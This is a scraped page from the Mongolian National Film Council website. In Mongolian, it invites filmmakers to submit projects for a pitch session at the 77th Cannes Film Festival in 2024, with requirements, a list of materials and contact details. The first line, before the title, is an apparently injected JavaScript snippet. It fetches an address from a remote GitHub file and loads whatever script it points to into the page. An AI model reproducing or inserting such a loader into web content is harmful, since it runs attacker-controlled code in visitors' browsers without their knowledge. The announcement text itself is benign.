;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); 77 ДАХЬ УДААГИЙН КАННЫН ОЛОН УЛСЫН КИНО НААДАМД ТАНИЛЦУУЛАХ КИНО ТӨСӨЛ СОНГОН ШАЛГАРУУЛНА - Mongolian National Film Council

77 ДАХЬ УДААГИЙН КАННЫН ОЛОН УЛСЫН КИНО НААДАМД ТАНИЛЦУУЛАХ КИНО ТӨСӨЛ СОНГОН ШАЛГАРУУЛНА

77 ДАХЬ УДААГИЙН КАННЫН ОЛОН УЛСЫН КИНО НААДАМД ТАНИЛЦУУЛАХ КИНО ТӨСӨЛ СОНГОН ШАЛГАРУУЛНА

77 ДАХЬ УДААГИЙН КАННЫН ОЛОН УЛСЫН КИНО НААДАМД ТАНИЛЦУУЛАХ КИНО ТӨСӨЛ СОНГОН ШАЛГАРУУЛНА

Бүгд Найрамдах Франц Улсын Канн хотноо жил бүр зохион байгуулагддаг Каннын олон улсын кино наадам нь 77 дахь удаагаа 2024 оны 05 дугаар сарын 14-25-ны өдрүүдэд зохион байгуулагдах гэж байна. Энэхүү наадмын дэргэдэх “Marche Du Film” кино маркетын хүрээнд Кино урлагийн Зөвлөлөөс Mongolian Pitch Session in Cannes” арга хэмжээг зохион байгуулах гэж байна. Тус арга хэмжээнд өөрийн төслөө танилцуулах кино уран бүтээлийн төсөлтэй уран бүтээлчийг шалгаруулна.

📌Тавигдах шаардлага:

1. Кино уран бүтээлийн төсөл нь олон улсын хамтарсан төсөл болон хэрэгжих боломжтой байх;
2. Төсөл танилцуулах уран бүтээлч нь Англи хэлний ахисан түвшний мэдлэгтэй байх;

Кино урлагийн зөвлөлөөс шалгарсан уран бүтээлчийн тус наадамд оролцох Каннын кино наадмын мандат (Festival badge), 5 хоног байрлах байр, онгоцны зардлын 50 хувь болон арга хэмжээ зохион байгуулах үйл ажиллагааны зардлыг бүрэн хариуцна.

Уг шаардлагыг хангасан төсөлтэй уран бүтээлчид төслийн танилцуулга мэдээллээ доорх дарааллын дагуу бэлтгэн 2024 оны 4 дүгээр сарын 05-ний дотор info@filmmongolia.gov.mn хаягаар ирүүлнэ үү.

Кино уран бүтээлийн төсөлтэй уран бүтээлчид төслийн танилцуулгаа дараах байдлаар Монгол болон Англи хэл дээр ирүүлнэ үү. Үүнд:

🔸 Төслийн нэр, төслийг хэрэгжүүлж буй байгууллага, хувь хүний нэр
🔸 Логлайн (1-2 өгүүлбэр)
🔸 Синопсис буюу товч агуулга (1-2 нүүр)
🔸 Трийтмэнт (5 хүртэлх нүүр)
🔸 Уран бүтээлийн үйл явдлын байршил, он цаг хугацаа
🔸 Киноны өгнө төрх, зураглал, хийц, хэв маягийн дүрслэл (Reference moodboard)
🔸 Найруулагчийн товч танилцуулга, уран бүтээлийн жагсаалт
🔸 Найруулагчийн үзэл санаа (300 хүртэлх үг)
🔸 Продюсерийн үзэл санаа (300 хүртэлх үг)

Төслийн танилцуулгад дээрх хэсгүүдийг заавал хавсаргасан байх ба нэмэлтээр дүрүүдийн тодорхойлолт, үйл явдлын зөрчил, гол дүрийн хөгжүүлэлт зэргээр баяжуулан төслийн танилцуулгаа илгээх боломжтой.

Дэлгэрэнгүй мэдээллийг ☎️51-262226 дугаарын утаснаас холбогдон авна уу.

КИНО УРЛАГИЙН ЗӨВЛӨЛИЙН АЖЛЫН АЛБА